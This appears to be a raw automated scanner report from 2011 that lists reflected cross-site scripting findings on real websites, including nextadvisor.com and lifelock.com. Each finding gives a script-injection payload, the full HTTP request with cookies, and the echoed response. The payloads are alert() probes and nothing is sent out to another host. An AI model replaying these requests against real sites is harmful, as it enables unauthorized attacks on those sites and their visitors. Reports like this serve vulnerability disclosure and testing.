GET /buttons/count?url=file%3A///C%3A/cdn/2011/04/23/dork/nextadvisorcom/reflected-xss-directory-traversal-file-inclusion-dork-ghdb-example-poc-report.htmle685f<script>alert(1)</script>8d158132c29 HTTP/1.1 Host: widgets.digg.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fe6d1<script>alert(1)</script>99e6fce44cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Server: nginx Date: Sun, 24 Apr 2011 12:45:23 GMT Content-Type: text/html;charset=UTF-8 Connection: keep-alive Vary: Accept-Encoding Set-Cookie: lc=en; Path=/ Content-Language: en Content-Length: 3651
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Online dating ...[SNIP]... <p>The page - /favicon.icofe6d1<script>alert(1)</script>99e6fce44cd - does not exist.</p> ...[SNIP]...
The value of the promocodehide request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e556"><script>alert(1)</script>7f71559fd29 was submitted in the promocodehide parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /offers/faces/female/?promocodehide=ADCONIONRT7e556"><script>alert(1)</script>7f71559fd29&c3metrics=adcon HTTP/1.1 Host: www.lifelock.com Proxy-Connection: keep-alive Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; LifeLockEnrollment=promoCode=GOOGSEARCH13; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6492a"><script>alert(1)</script>31358a97f04 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.ico6492a"><script>alert(1)</script>31358a97f04 HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f416"><script>alert(1)</script>4731f60ad3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89eaf"><script>alert(1)</script>c76e2d7db84 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8d1ab'><img%20src%3da%20onerror%3dalert(1)>b4f6c6a7ca7 was submitted in the REST URL parameter 2. This input was echoed as 8d1ab'><img src=a onerror=alert(1)>b4f6c6a7ca7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d368"><script>alert(1)</script>a121883116c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 312bd"><script>alert(1)</script>b453ad10c5a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79021"><script>alert(1)</script>982aa0608fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6b593'><img%20src%3da%20onerror%3dalert(1)>2fa20870a22 was submitted in the REST URL parameter 2. This input was echoed as 6b593'><img src=a onerror=alert(1)>2fa20870a22 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c41a"><script>alert(1)</script>349ece8baa9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 793b4"><script>alert(1)</script>a2d9ab8e691 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /includes793b4"><script>alert(1)</script>a2d9ab8e691/javascript.php?script=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9f7e3'><img%20src%3da%20onerror%3dalert(1)>9791e26f04a was submitted in the REST URL parameter 1. This input was echoed as 9f7e3'><img src=a onerror=alert(1)>9791e26f04a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /includes9f7e3'><img%20src%3da%20onerror%3dalert(1)>9791e26f04a/javascript.php?script=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88492"><script>alert(1)</script>7ca6639f3e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /includes/javascript.php88492"><script>alert(1)</script>7ca6639f3e5?script=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cce4"><script>alert(1)</script>1a534bed66f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /link.php1cce4"><script>alert(1)</script>1a534bed66f?kw=gid9a%20identity%20theft%20resource_ordering34&category=identitytheft&link=idtheftshield&id=227 HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ad9f"><script>alert(1)</script>0b406646753 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pmid9ad9f"><script>alert(1)</script>0b406646753?kw=id%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01CD1 HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49117"><script>alert(1)</script>f1090dfeda0 was submitted in the kw parameter. This input was echoed as 49117\"><script>alert(1)</script>f1090dfeda0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pmid?kw=id%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01CD149117"><script>alert(1)</script>f1090dfeda0 HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80329"><script>alert(1)</script>4aaae51729d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pmid80329"><script>alert(1)</script>4aaae51729d/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1 HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9d626'><img%20src%3da%20onerror%3dalert(1)>287be27fca8 was submitted in the REST URL parameter 1. This input was echoed as 9d626'><img src=a onerror=alert(1)>287be27fca8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /pmid9d626'><img%20src%3da%20onerror%3dalert(1)>287be27fca8/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1 HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f50a"><script>alert(1)</script>44a276d8c09 was submitted in the kw parameter. This input was echoed as 1f50a\"><script>alert(1)</script>44a276d8c09 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD11f50a"><script>alert(1)</script>44a276d8c09 HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24a2c"><script>alert(1)</script>911df5ea084 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pmid24a2c"><script>alert(1)</script>911df5ea084/js/jquery.js HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f8df7'><img%20src%3da%20onerror%3dalert(1)>6cd5eb81ae0 was submitted in the REST URL parameter 2. This input was echoed as f8df7'><img src=a onerror=alert(1)>6cd5eb81ae0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /pmid/jsf8df7'><img%20src%3da%20onerror%3dalert(1)>6cd5eb81ae0/jquery.js HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fec85"><script>alert(1)</script>1df6d9d92ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pmid/jsfec85"><script>alert(1)</script>1df6d9d92ab/jquery.js HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c828a"><script>alert(1)</script>d972e93d2be was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
